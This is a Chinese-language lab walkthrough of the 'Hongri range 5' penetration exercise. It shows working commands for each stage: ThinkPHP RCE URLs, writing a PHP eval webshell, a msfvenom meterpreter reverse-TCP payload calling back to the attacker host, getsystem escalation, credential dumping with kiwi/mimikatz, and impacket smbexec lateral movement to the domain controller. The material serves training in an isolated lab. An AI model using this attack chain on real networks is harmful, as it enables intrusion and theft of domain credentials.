内网渗透之红日靶场五

📅 2026/7/2 2:28:49
内网渗透之红日靶场五
实验环境注意这里给 win7 和域控配置外网 IP 时必须与 kali 攻击机在同一网段不然 ping 不通。win7 修改网络配置时需要管理员账密sun\Administrator dc123.com关闭被攻击机的防火墙启动 win7 服务器渗透过程整体线路预览外网打点访问 http://192.168.37.131 可以看到 ThinkPHP 页面我们尝试利用 ThinPHP 的 RCE 漏洞拿 Webshell确认 RCE 漏洞存在在 kali 浏览器中访问把 IP 换成自己设置的 win7 的 IPhttp://192.168.115.131/?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]whoami页面返回这个说明现在权限很高存在漏洞写入一句话木马在浏览器地址栏中执行http://192.168.115.131/?sindex/\think\app/invokefunctionfunctioncall_user_func_arrayvars[0]systemvars[1][]echo ^?php eval($_POST[cmd]);?^ C:\phpStudy\PHPTutorial\WWW\public\shell.php验证木马写入成功访问 http://192.168.115.131/shell.php 看到白色空白页面说明 webshell 写入成功蚁剑连接信息收集与权限提升为了维持权限和方便使用工具我们需要先制作一个反向 shellMSF 上线打开一个终端用msfvenom生成 Payloadmsfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.115.84 LPORT4444 -f exe -o shell.exeLHOST 和 LPORT 必须和监听器一致。输出文件名为shell.exe保存在当前目录如 /home/kali/Desktop/。在 MSF 中设置监听启动msfconsole在 MSF 中设置监听器通过蚁剑上传并执行拖拽上传 shell.exe 之后在蚁剑虚拟终端中执行C:\shell.exe获取 Meterpreter 会话记下 session id这里为 1 进入会话添加内网路由接下来进行信息收集执行ipconfig /all可以看到这里还有一个 192.168.52.143 的内网网卡说明有域。执行arp -a寻找内网存活主机也是成功发现了 IP 为 192.168.52.138 的 Win Server 2008 域控 DC使用mimikatz抓取域管理员的明文密码在新版的 MSF 中mimikatz的功能已经被整合到了一个叫kiwi的模块里在 meterpreter 提示符下输入命令使用kiwi模块提供的命令来抓取密码最常用的是显示权限不足那先来提权先试试最简单的 getsystem提权成功再执行抓取明文密码的命令creds_all可以看到域管理员账密为sun.comdc123.com横向移动使用smbexec模块来进行横向移动。先将当前 Meterpreter 会话转为后台退回到 msf加载 smbexec设置模块参数说明RHOSTS是目标域控的 IPSMBUser/SMBPass是刚刚抓到的域管理员账号密码LPORT可以换成任意未被占用的端口如果这种加载 smbexec 的方式行不通可以这样python3 /usr/share/doc/python3-impacket/examples/smbexec.py SUN.COM/Administrator:dc123.com192.168.52.138可以看到横向移动成功